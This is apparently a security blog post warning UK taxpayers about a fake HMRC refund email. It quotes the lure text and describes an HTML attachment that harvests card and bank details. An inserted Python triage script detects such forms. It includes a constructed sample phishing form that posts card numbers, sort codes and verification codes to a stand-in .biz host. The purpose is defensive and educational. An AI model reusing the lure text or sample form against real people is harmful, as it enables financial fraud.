
Fake HMRC Tax Refund Mail Goes Phishing

If you pay taxes in the UK, please be aware that scammers are currently sending fake HMRC tax refund attachments via email. Here’s the email complete with attachment:

Fake HMRC tax refund

The text reads as follows:

-----Original Message-----
From: HM Revenue & Customs [mailto:refund-taxAT@hmrc.gov.uk]
Sent: 09 December 2013 21:18
To: UK321712AThmrc.gov.co.uk.com
Subject: Submit Your Tax Refund

Dear Applicant:

Following an upgrade of our computer systems and review of our records we have investigated your payments and latest tax returns over the last seven years our calculations show you have made over payments of GBP 323.56 Due to the high volume of refunds due you must complete the online application, the telephone help line is unable to assist with this application. In order to process your refund you will need to complete the attached application form. Your refund may take up to 3 weeks to process please make sure you complete the form correctly.

To access your tax refund, please follow the steps below:

– download the Tax Refund Form attached to this email
– open it in a browser
– follow the instructions on your screen

Regards, HM Revenue & Customs

This is, of course, complete nonsense. The attachment is a slice of HTML designed to be opened in a web browser, and with JavaScript enabled the scam can work some magic on unsuspecting victims.

Fake refund attachment

The information the scammers ask for includes full name, address, date of birth, card number, sort code, account number, telephone number, verification code and more.

Once the victim has filled everything in, they’re encouraged to press the “Submit informations” button. One would hope the typo would be enough to raise suspicion in some, but of course it won’t save everybody.

The scammers here are really quite precise with regard to the information they’re after. Make a mistake, leave a section blank or type something not to their liking, and…


The form does this for everything: type more or less than a 16-digit credit card number, and it’ll tell you to go back and fix it. Put letters into the phone number? You’ll have to go back and fix it. Make a mess of the sort code / account number? You’ll have to… you guessed it… go back and fix it.

Here’s the full list of “You’ve been a very naughty boy” messages from the code:

Sir, yes Sir

Hitting the submit button sends the information, via the form, to a URL on a .biz domain which appears to be a compromised site.
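The two tells described above (a form that asks for card and bank details, and a submit target on a domain unrelated to the claimed sender) are exactly what a mail-gateway or analyst triage script can check for without ever opening the attachment in a browser. The following is an added example written for this post, not code from the scam kit or from Malwarebytes; the HTML sample, the field names and the `example-compromised-site.biz` host are all constructed placeholders, and the claimed sender domain is passed in by the caller.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Field names, ids or placeholders that a genuine tax-refund notice would never
# collect by email. The patterns allow spaces, underscores or hyphens between words.
SENSITIVE_PATTERNS = {
    "card_number": re.compile(r"card[\s_-]*(number|no)|cardnum|ccnum", re.I),
    "sort_code": re.compile(r"sort[\s_-]*code", re.I),
    "account_number": re.compile(r"account[\s_-]*(number|no)|accnum", re.I),
    "verification_code": re.compile(r"(verification|security|cvv|cvc)[\s_-]*code", re.I),
    "date_of_birth": re.compile(r"date[\s_-]*of[\s_-]*birth|\bdob\b", re.I),
}

# Length checks such as "value.length != 16" are the client-side card-number
# validation the post describes; their presence in an "attached form" is a strong tell.
CARD_LENGTH_CHECK = re.compile(r"\.length\s*(!==|!=|===|==)\s*16")


class FormCollector(HTMLParser):
    """Collect every <form> action plus the name/id/placeholder of each field inside it."""

    def __init__(self):
        super().__init__()
        self.forms = []      # list of {"action": str, "fields": [str]}
        self._current = None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self._current = {"action": a.get("action") or "", "fields": []}
            self.forms.append(self._current)
        elif tag in ("input", "select", "textarea") and self._current is not None:
            label = " ".join(v for v in (a.get("name"), a.get("id"), a.get("placeholder")) if v)
            self._current["fields"].append(label)

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None


def triage_attachment(html_text, claimed_sender_domain):
    """Return a list of human-readable findings for an HTML attachment that
    claims to come from `claimed_sender_domain` (e.g. "hmrc.gov.uk")."""
    collector = FormCollector()
    collector.feed(html_text)
    findings = []
    for form in collector.forms:
        target = urlparse(form["action"])
        host = target.hostname or ""
        if target.scheme == "mailto":
            # Some kits skip a web server entirely and mail the form to a drop box.
            findings.append(f"form mails submissions to {target.path}")
        elif host and host != claimed_sender_domain and not host.endswith("." + claimed_sender_domain):
            findings.append(f"form posts off-domain to {host}")
        asked = sorted({key for field in form["fields"]
                        for key, rx in SENSITIVE_PATTERNS.items() if rx.search(field)})
        if asked:
            findings.append("form requests " + ", ".join(asked))
    if CARD_LENGTH_CHECK.search(html_text):
        findings.append("script enforces a 16-character length check (card-number style)")
    return findings


# Constructed sample modelled on the refund form described in the post; not the real attachment.
SAMPLE_ATTACHMENT = """<html><body>
<h1>HM Revenue &amp; Customs - Tax Refund Form</h1>
<form method="post" action="http://example-compromised-site.biz/refund/submit.php">
  <input name="fullname" placeholder="Full name">
  <input name="dob" placeholder="Date of birth">
  <input name="card_number" placeholder="Card number">
  <input name="sort_code"> <input name="account_number">
  <input name="verification_code" placeholder="Verification code">
  <input type="submit" value="Submit informations">
</form>
<script>
function check(f){ if(f.card_number.value.length != 16){ alert('Please go back and fix it'); return false; } return true; }
</script>
</body></html>"""

if __name__ == "__main__":
    for finding in triage_attachment(SAMPLE_ATTACHMENT, "hmrc.gov.uk"):
        print("-", finding)
```

Run against the constructed sample, the script reports the off-domain post target, the five categories of banking data the form collects, and the card-length check; a form whose action stays on the claimed sender's domain and asks only for a name produces no findings. The host comparison deliberately accepts subdomains of the claimed domain, so a genuine service host under gov.uk is not flagged while an unrelated .biz host is.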

HMRC have some advice for those unlucky enough to be sent a phishing mail on their Reporting a Phish page. The golden rule:

  • HM Revenue & Customs (HMRC) will never send notifications of a tax rebate by email, or ask you to disclose personal or payment information by email.

Scammers will often send victims malware attachments instead of a phishing mail, so it pays twice over to steer clear of random tax refund emails.

A few weeks before the holidays begin is not a good time to have your bank account cleaned out by a tax phish Scrooge.

Christopher Boyd (Thanks to Dom for sending this over)


Christopher Boyd

Former Director of Research at FaceTime Security Labs. He has a very particular set of skills. Skills that make him a nightmare for threats like you.